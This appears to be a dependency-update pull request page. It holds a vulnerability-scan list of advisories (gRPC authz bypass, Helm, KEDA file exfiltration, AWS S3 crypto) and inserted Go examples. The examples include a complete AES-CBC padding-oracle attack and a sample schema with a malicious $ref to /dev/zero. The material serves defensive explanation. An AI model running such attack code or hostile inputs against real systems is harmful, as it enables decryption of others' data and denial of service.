uniget-bot changed the title from "chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.28" to "chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.30" on Feb 20, 2026
uniget-bot changed the title from "chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.30" to "chore(deps): update dependency k8sgpt-ai/k8sgpt to v0.4.31" on Mar 24, 2026
A critical authentication bypass vulnerability exists in Ollama platform's API endpoints in versions prior to and including v0.12.3. The platform exposes multiple API endpoints without requiring authentication, enabling remote attackers to perform unauthorized model management operations.
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Divide By Zero vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Allocation of Resources Without Limits or Throttling vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Denial of Service (DoS) via Null Pointer Dereference in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Divide by Zero Vulnerability in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Vulnerable to Denial of Service (DoS) via Crafted GZIP in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama Allows Out-of-Bounds Read in github.com/ollama/ollama
Affected range
>=0
Fixed version
Not Fixed
Description
Ollama vulnerable to Cross-Domain Token Exposure in github.com/ollama/ollama
google.golang.org/grpc 1.73.0 (golang)
pkg:golang/google.golang.org/grpc@1.73.0
Improper Authorization
Affected range
<1.79.3
Fixed version
1.79.3
CVSS Score
9.1
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Description
Impact
What kind of vulnerability is it? Who is impacted?
It is an Authorization Bypass resulting from Improper Input Validation of the HTTP/2 :path pseudo-header.
The gRPC-Go server was too lenient in its routing logic, accepting requests where the :path omitted the mandatory leading slash (e.g., Service/Method instead of /Service/Method). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official grpc/authz package) evaluated the raw, non-canonical path string. Consequently, "deny" rules defined using canonical paths (starting with /) failed to match the incoming request, allowing it to bypass the policy if a fallback "allow" rule was present.
Who is impacted?
This affects gRPC-Go servers that meet both of the following criteria:
They use path-based authorization interceptors, such as the official RBAC implementation in google.golang.org/grpc/authz or custom interceptors relying on info.FullMethod or grpc.Method(ctx).
Their security policy contains specific "deny" rules for canonical paths but allows other requests by default (a fallback "allow" rule).
The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed :path headers directly to the gRPC server.
Patches
Has the problem been patched? What versions should users upgrade to?
Yes, the issue has been patched. The fix ensures that any request with a :path that does not start with a leading slash is immediately rejected with a codes.Unimplemented error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string.
Users should upgrade to the following versions (or newer):
v1.79.3
The latest master branch.
It is recommended that all users employing path-based authorization (especially grpc/authz) upgrade as soon as the patch is available in a tagged release.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods:
1. Use a Validating Interceptor (Recommended Mitigation)
Add an "outermost" interceptor to your server that validates the path before any other authorization logic runs:
import (
	"context"
	"google.golang.org/grpc"
	"google.golang.org/grpc/codes"
	"google.golang.org/grpc/status"
)

// pathValidationInterceptor rejects any method name that lacks the mandatory leading slash.
func pathValidationInterceptor(ctx context.Context, req any, info *grpc.UnaryServerInfo, handler grpc.UnaryHandler) (any, error) {
	if info.FullMethod == "" || info.FullMethod[0] != '/' {
		return nil, status.Errorf(codes.Unimplemented, "malformed method name")
	}
	return handler(ctx, req)
}

// Ensure this is the FIRST interceptor in your chain (authzInterceptor is your existing authorization interceptor):
s := grpc.NewServer(
	grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor),
)
2. Infrastructure-Level Normalization
If your gRPC server is behind a reverse proxy or load balancer (such as Envoy, NGINX, or an L7 Cloud Load Balancer), ensure it is configured to enforce strict HTTP/2 compliance for pseudo-headers and reject or normalize requests where the :path header does not start with a leading slash.
3. Policy Hardening
Switch to a "default deny" posture in your authorization policies (explicitly listing all allowed paths and denying everything else) to reduce the risk of bypasses via malformed inputs.
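To make the mismatch concrete, here is an added example, not grpc-go's code and not the grpc/authz package, that models a deny-list policy the way a path-based interceptor sees it (a raw method string, no canonicalisation), then runs the same policy behind the leading-slash check from mitigation 1 and behind the default-deny posture from mitigation 3. The Policy type, the method names and the error strings are constructed for this example.

```go
package main

import (
	"errors"
	"fmt"
)

// Policy models the RBAC shape the advisory warns about: deny rules keyed on
// canonical method names, an optional explicit allow list, and a fallback.
type Policy struct {
	DenyMethods    []string // canonical, e.g. "/admin.Admin/DeleteUser"
	AllowMethods   []string // canonical; only consulted when AllowByDefault is false
	AllowByDefault bool     // the fallback "allow" rule that makes the bypass matter
}

var (
	ErrUnimplemented    = errors.New("rpc error: code = Unimplemented desc = malformed method name")
	ErrPermissionDenied = errors.New("rpc error: code = PermissionDenied desc = unauthorized RPC request rejected")
)

// authorize evaluates the policy against fullMethod exactly as a path-based
// interceptor sees it (info.FullMethod / grpc.Method(ctx)): a raw string with
// no canonicalisation. Before the fix, a :path of "admin.Admin/DeleteUser"
// reached this logic unchanged and matched no canonical deny rule.
func authorize(p Policy, fullMethod string) error {
	for _, m := range p.DenyMethods {
		if m == fullMethod {
			return ErrPermissionDenied
		}
	}
	if p.AllowByDefault {
		return nil
	}
	for _, m := range p.AllowMethods {
		if m == fullMethod {
			return nil
		}
	}
	return ErrPermissionDenied
}

// validateFullMethod is the check the advisory's outermost interceptor
// performs: reject any method name without the mandatory leading slash.
func validateFullMethod(fullMethod string) error {
	if fullMethod == "" || fullMethod[0] != '/' {
		return ErrUnimplemented
	}
	return nil
}

// authorizeHardened runs the validator before the policy, mirroring
// grpc.ChainUnaryInterceptor(pathValidationInterceptor, authzInterceptor).
func authorizeHardened(p Policy, fullMethod string) error {
	if err := validateFullMethod(fullMethod); err != nil {
		return err
	}
	return authorize(p, fullMethod)
}

func main() {
	// Vulnerable shape: deny one admin method, allow everything else.
	denyList := Policy{DenyMethods: []string{"/admin.Admin/DeleteUser"}, AllowByDefault: true}
	// Mitigation 3: default deny with an explicit allow list.
	defaultDeny := Policy{DenyMethods: []string{"/admin.Admin/DeleteUser"}, AllowMethods: []string{"/public.Echo/Ping"}}

	for _, path := range []string{"/admin.Admin/DeleteUser", "admin.Admin/DeleteUser", "/public.Echo/Ping", "public.Echo/Ping"} {
		fmt.Printf("%-25s unpatched+denylist=%v hardened=%v defaultdeny=%v\n",
			path, authorize(denyList, path), authorizeHardened(denyList, path), authorize(defaultDeny, path))
	}
}
```

The advisory shows only the unary form of the validating interceptor; the same leading-slash check belongs in a grpc.StreamServerInterceptor, where the method name arrives as info.FullMethod on grpc.StreamServerInfo.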
golang.org/x/crypto 0.40.0 (golang)
pkg:golang/golang.org/x/crypto@0.40.0
Affected range
<0.43.0
Fixed version
0.43.0
Description
SSH clients receiving SSH_AGENT_SUCCESS when expecting a typed response will panic and cause early termination of the client process.
Allocation of Resources Without Limits or Throttling
Affected range
<0.45.0
Fixed version
0.45.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Description
SSH servers parsing GSSAPI authentication requests do not validate the number of mechanisms specified in the request, allowing an attacker to cause unbounded memory consumption.
Out-of-bounds Read
Affected range
<0.45.0
Fixed version
0.45.0
CVSS Score
5.3
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Description
SSH Agent servers do not validate the size of messages when processing new identity requests, which may cause the program to panic if the message is malformed due to an out of bounds read.
helm.sh/helm/v3 3.17.4 (golang)
pkg:golang/helm.sh/helm/v3@3.17.4
Affected range
<3.18.4
Fixed version
3.18.4
Description
Helm vulnerable to Code Injection through malicious chart.yaml content in helm.sh/helm
Allocation of Resources Without Limits or Throttling
Affected range
<3.18.5
Fixed version
3.18.5
CVSS Score
6.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Description
A Helm contributor discovered that it was possible to craft a JSON Schema file in a manner which could cause Helm to use all available memory and have an out of memory (OOM) termination.
Impact
A malicious chart can point $ref in values.schema.json to a device (e.g. /dev/*) or other problem file which could cause Helm to use all available memory and have an out of memory (OOM) termination.
Patches
This issue has been resolved in Helm v3.18.5.
Workarounds
Make sure that no Helm chart being loaded into Helm contains a $ref pointing to /dev/zero.
References
Helm's security policy is spelled out in detail in our SECURITY document.
Credits
Disclosed by Jakub Ciolek at AlphaSense.
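As an added example, not Helm's own code, here is a pre-load check for the workaround above: parse values.schema.json and refuse any $ref that is not a local JSON-pointer fragment. That is broader than the /dev/zero case the advisory names (the assumption being that a chart has no legitimate reason to reference devices, files or URLs from its values schema), with a separate helper that flags the device-node case specifically. The sample schema is constructed for the demo.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
	"strings"
)

// findUnsafeRefs parses a values.schema.json document and returns, sorted,
// every $ref target that is not a local JSON-pointer fragment ("#/..."). A
// non-fragment $ref is what makes a schema loader open a path such as
// /dev/zero, so it is the thing to refuse before handing the chart to Helm.
func findUnsafeRefs(schema []byte) ([]string, error) {
	var doc any
	if err := json.Unmarshal(schema, &doc); err != nil {
		return nil, fmt.Errorf("values.schema.json: %w", err)
	}
	var bad []string
	walk(doc, func(ref string) {
		if !strings.HasPrefix(ref, "#") {
			bad = append(bad, ref)
		}
	})
	sort.Strings(bad)
	return bad, nil
}

// walk visits every "$ref" key whose value is a string, anywhere in the tree.
// A property literally named "$ref" under "properties" would also be visited;
// for a pre-load lint that false positive is accepted (assumption of this example).
func walk(v any, visit func(string)) {
	switch n := v.(type) {
	case map[string]any:
		for k, c := range n {
			if s, ok := c.(string); ok && k == "$ref" {
				visit(s)
				continue
			}
			walk(c, visit)
		}
	case []any:
		for _, c := range n {
			walk(c, visit)
		}
	}
}

// isDeviceRef reports whether a $ref points at a device node, the specific
// case from the advisory, with or without a file:// scheme.
func isDeviceRef(ref string) bool {
	ref = strings.TrimPrefix(ref, "file://")
	return strings.HasPrefix(ref, "/dev/")
}

// constructedSchema is a sample values.schema.json: one legitimate local
// reference and one $ref that would make the loader read /dev/zero.
const constructedSchema = `{
  "$schema": "https://json-schema.org/draft-07/schema#",
  "type": "object",
  "definitions": {"image": {"type": "string"}},
  "properties": {
    "image": {"$ref": "#/definitions/image"},
    "replicas": {"$ref": "/dev/zero"}
  }
}`

func main() {
	bad, err := findUnsafeRefs([]byte(constructedSchema))
	if err != nil {
		panic(err)
	}
	for _, r := range bad {
		fmt.Printf("unsafe $ref %q (device node: %v)\n", r, isDeviceRef(r))
	}
}
```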
Use of Uninitialized Resource
Affected range
<3.18.5
Fixed version
3.18.5
CVSS Score
6.5
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Description
A Helm contributor discovered an improper validation of type error when parsing Chart.yaml and index.yaml files that can lead to a panic.
Impact
There are two areas of YAML validation that were impacted. First, when a Chart.yaml file had a null maintainer or the child or parent of a dependencies import-values could be parsed as something other than a string, helm lint would panic. Second, when an index.yaml had an empty entry in the list of chart versions Helm would panic on interactions with that repository.
Patches
This issue has been resolved in Helm v3.18.5.
Workarounds
Ensure YAML files are formatted as Helm expects prior to processing them with Helm.
References
Helm's security policy is spelled out in detail in our SECURITY document.
Credits
Disclosed by Jakub Ciolek at AlphaSense.
stdlib 1.24.13 (golang)
pkg:golang/stdlib@1.24.13
Affected range
<1.25.8
Fixed version
1.25.8
Description
url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.
Affected range
<1.25.8
Fixed version
1.25.8
Description
Actions which insert URLs into the content attribute of HTML meta tags are not escaped. This can allow XSS if the meta tag also has an http-equiv attribute with the value "refresh".
A new GODEBUG setting has been added, htmlmetacontenturlescape, which can be used to disable escaping URLs in actions in the meta content attribute which follow "url=" by setting htmlmetacontenturlescape=0.
Affected range
<1.25.8
Fixed version
1.25.8
Description
On Unix platforms, when listing the contents of a directory using File.ReadDir or File.Readdir the returned FileInfo could reference a file outside of the Root in which the File was opened.
The impact of this escape is limited to reading metadata provided by lstat from arbitrary locations on the filesystem without permitting reading or writing files outside the root.
The Delete function fails to properly validate offsets when processing malformed JSON input. This can lead to a negative slice index and a runtime panic, allowing a denial of service attack.
Affected range
>=0.0.0
Fixed version
Not Fixed
An Arbitrary File Read vulnerability has been identified in KEDA, potentially affecting any KEDA resource that uses TriggerAuthentication to configure HashiCorp Vault authentication.
The vulnerability stems from an incorrect or insufficient path validation when loading the Service Account Token specified in spec.hashiCorpVault.credential.serviceAccount.
An attacker with permissions to create or modify a TriggerAuthentication resource can exfiltrate the content of any file from the node's filesystem (where the KEDA pod resides) by directing the file's content to a server under their control, as part of the Vault authentication request.
The potential impact includes the exfiltration of sensitive system information, such as secrets, keys, or the content of files like /etc/passwd.
Patches
The problem has been patched in v2.17.3 and 2.18.3 as well as in main branch.
Workarounds
The only effective workaround is the strict restriction of permissions for creating and modifying TriggerAuthentication resources within the Kubernetes cluster.
Only trusted and authorized users should have create or update permissions on the TriggerAuthentication resource.
This limits an attacker's ability to configure a malicious TriggerAuthentication with an arbitrary path.
Is my project affected?
Run
kubectl get deploy keda-operator -n keda -o jsonpath="{.spec.template.spec.containers[0].image}"
If the reported version is not 2.17.3, 2.18.3 or >= 2.19.0, that version is affected.
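Added example, not KEDA's code: apply the rule above to the image string that the kubectl command prints, including the tag forms a practitioner actually meets (a leading "v", a registry with a port, a digest-only reference that carries no version). The image references below are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// kedaVersion extracts major.minor.patch from an image reference such as
// "ghcr.io/kedacore/keda:2.18.2" (a leading "v" in the tag is tolerated).
// Digest-only references carry no version and are reported as an error.
func kedaVersion(image string) ([3]int, error) {
	var v [3]int
	if i := strings.Index(image, "@"); i >= 0 {
		image = image[:i] // drop "@sha256:..."
	}
	i := strings.LastIndex(image, ":")
	if i < 0 || strings.Contains(image[i:], "/") { // no tag, or the ":" is a registry port
		return v, errors.New("image reference has no tag; resolve the digest to a release first")
	}
	tag := strings.TrimPrefix(image[i+1:], "v")
	parts := strings.Split(tag, ".")
	if len(parts) != 3 {
		return v, fmt.Errorf("tag %q is not major.minor.patch", tag)
	}
	for j, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return v, fmt.Errorf("tag %q is not numeric", tag)
		}
		v[j] = n
	}
	return v, nil
}

// kedaAffected applies the advisory's rule literally: anything other than
// 2.17.3, 2.18.3 or >= 2.19.0 is affected.
func kedaAffected(image string) (bool, error) {
	v, err := kedaVersion(image)
	if err != nil {
		return false, err
	}
	if v == [3]int{2, 17, 3} || v == [3]int{2, 18, 3} {
		return false, nil
	}
	if v[0] > 2 || (v[0] == 2 && v[1] >= 19) {
		return false, nil
	}
	return true, nil
}

func main() {
	// Constructed image references; in practice feed in the output of
	// kubectl get deploy keda-operator -n keda -o jsonpath="{.spec.template.spec.containers[0].image}"
	for _, img := range []string{
		"ghcr.io/kedacore/keda:2.18.2",
		"ghcr.io/kedacore/keda:2.18.3",
		"registry.local:5000/kedacore/keda:v2.16.1",
		"ghcr.io/kedacore/keda@sha256:0000000000000000000000000000000000000000000000000000000000000000", // placeholder digest
	} {
		affected, err := kedaAffected(img)
		fmt.Printf("%-95s affected=%v err=%v\n", img, affected, err)
	}
}
```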
go.opentelemetry.io/otel/sdk 1.36.0 (golang)
pkg:golang/go.opentelemetry.io/otel/sdk@1.36.0
Untrusted Search Path
Affected range
>=1.21.0 <1.40.0
Fixed version
1.40.0
CVSS Score
7
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
Impact
The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application.
Patches
This has been patched in d45961b, which was released with v1.40.0.
Docker CLI for Windows searches for plugin binaries in C:\ProgramData\Docker\cli-plugins, a directory that does not exist by default. A low-privileged attacker can create this directory and place malicious CLI plugin binaries (docker-compose.exe, docker-buildx.exe, etc.) that are executed when a victim user opens Docker Desktop or invokes Docker CLI plugin features, and allow privilege-escalation if the docker CLI is executed as a privileged user.
This issue affects Docker CLI through v29.1.5 (fixed in v29.2.0). It impacts Windows binaries acting as a CLI plugin manager via the github.com/docker/cli/cli-plugins/manager package, which is consumed by downstream projects such as Docker Compose.
Docker Compose became affected starting in v2.31.0, when it incorporated the relevant CLI plugin manager code (see docker/compose#12300), and is fixed in v5.1.0.
This issue does not impact non-Windows binaries or projects that do not use the plugin manager code.
Patches
Fixed in v29.2.0 and later.
This issue was fixed in docker/cli@1375933 (docker/cli#6713), which removed %PROGRAMDATA%\Docker\cli-plugins from the list of paths used for plugin-discovery on Windows.
Nitesh Surana (niteshsurana.com) of Trend Research of TrendAI
golang.org/x/net 0.42.0 (golang)
pkg:golang/golang.org/x/net@0.42.0
Affected range
<0.45.0
Fixed version
0.45.0
Description
The html.Parse function in golang.org/x/net/html has an infinite parsing loop when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.
Affected range
<0.45.0
Fixed version
0.45.0
Description
The html.Parse function in golang.org/x/net/html has quadratic parsing complexity when processing certain inputs, which can lead to denial of service (DoS) if an attacker provides specially crafted HTML content.
A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC). An attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file can therefore reconstruct the plaintext with (on average) 128 * length(plaintext) queries to the endpoint, by exploiting CBC's malleability (modifying bytes of one ciphertext block to manipulate the next decrypted block) and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
Affected range
>=0
Fixed version
Not Fixed
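To show why an unauthenticated AES-CBC object is fatal, here is an added example of the attack described above, written for this page and not taken from the AWS SDK: a stored object modelled as IV || CBC ciphertext with no MAC, an oracle that holds the key and leaks only whether decryption produced valid PKCS#7 padding, and an attacker that recovers the plaintext from the oracle alone. The key and message are constructed; the query counter lets you check the roughly 128-queries-per-byte average the description quotes.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
)

// pad applies PKCS#5/#7 padding, the scheme the unauthenticated CBC mode used.
func pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

// unpad checks the padding; its error is the only signal the oracle leaks.
func unpad(b []byte) ([]byte, error) {
	if len(b) == 0 {
		return nil, errors.New("bad padding")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) {
		return nil, errors.New("bad padding")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("bad padding")
		}
	}
	return b[:len(b)-n], nil
}

// encryptCBC models the stored object: IV || AES-CBC ciphertext, no MAC.
func encryptCBC(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := pad(plaintext)
	out := make([]byte, aes.BlockSize+len(pt))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], pt)
	return out, nil
}

// paddingOracle models the key-holding endpoint: it reveals only whether a
// ciphertext decrypts to valid padding (success vs. error response).
func paddingOracle(key []byte) func(ct []byte) bool {
	block, _ := aes.NewCipher(key)
	return func(ct []byte) bool {
		if len(ct) < 2*aes.BlockSize || len(ct)%aes.BlockSize != 0 {
			return false
		}
		pt := make([]byte, len(ct)-aes.BlockSize)
		cipher.NewCBCDecrypter(block, ct[:aes.BlockSize]).CryptBlocks(pt, ct[aes.BlockSize:])
		_, err := unpad(pt)
		return err == nil
	}
}

// recoverPlaintext is the attacker: it uses bucket write access (forged
// ciphertexts) and the oracle, never the key. Returns plaintext and query count.
func recoverPlaintext(ct []byte, oracle func([]byte) bool) ([]byte, int) {
	bs := aes.BlockSize
	queries := 0
	var out []byte
	for i := bs; i < len(ct); i += bs { // each block C_i with its predecessor (IV for the first)
		prev, cur := ct[i-bs:i], ct[i:i+bs]
		inter := make([]byte, bs) // D_k(C_i): block-cipher output before the CBC XOR
		for pos := bs - 1; pos >= 0; pos-- {
			padVal := byte(bs - pos)
			forged := make([]byte, 2*bs) // forged "IV" || C_i
			copy(forged[bs:], cur)
			for j := pos + 1; j < bs; j++ { // force already-recovered tail bytes to padVal
				forged[j] = inter[j] ^ padVal
			}
			for guess := 0; guess < 256; guess++ {
				forged[pos] = byte(guess)
				queries++
				if !oracle(forged) {
					continue
				}
				if pos == bs-1 { // rule out accidental longer padding such as 0x02 0x02
					forged[pos-1] ^= 0xff
					queries++
					ok := oracle(forged)
					forged[pos-1] ^= 0xff
					if !ok {
						continue
					}
				}
				inter[pos] = byte(guess) ^ padVal
				break
			}
		}
		for j := 0; j < bs; j++ { // P_i = D_k(C_i) XOR C_{i-1}
			out = append(out, inter[j]^prev[j])
		}
	}
	pt, _ := unpad(out)
	return pt, queries
}

func main() {
	key := []byte("0123456789abcdef") // constructed demo key; the attacker never sees it
	msg := []byte("constructed demo secret: attack at dawn")
	ct, err := encryptCBC(key, msg)
	if err != nil {
		panic(err)
	}
	got, q := recoverPlaintext(ct, paddingOracle(key))
	fmt.Printf("recovered %q with %d oracle queries for %d bytes\n", got, q, len(msg))
}
```

The second advisory on this page (AES-GCM downgraded to AES-CTR through in-band algorithm negotiation) is a different attack on the same root cause: metadata and ciphertext that an attacker with bucket write access can alter are not authenticated, so the V2 SDK's move to authenticated modes and re-encryption are the remediation for both.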
Description
A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.
This PR contains the following updates:
k8sgpt-ai/k8sgpt: 0.4.27 → 0.4.31
Warning: Some dependencies could not be looked up. Check the Dependency Dashboard for more information.
Release Notes
k8sgpt-ai/k8sgpt (k8sgpt-ai/k8sgpt)
v0.4.31 (Compare Source)
Features
Other
Docs
v0.4.30 (Compare Source)
Bug Fixes
v0.4.29 (Compare Source)
Features
Bug Fixes
b8788ab (#1572) (a56e478)
Refactoring
v0.4.28 (Compare Source)
Features
Bug Fixes
Other
93cb6ef (#1592) (40ffcbe)
40f1582 (#1593) (a303ffa)
Configuration
📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR has been generated by Renovate Bot.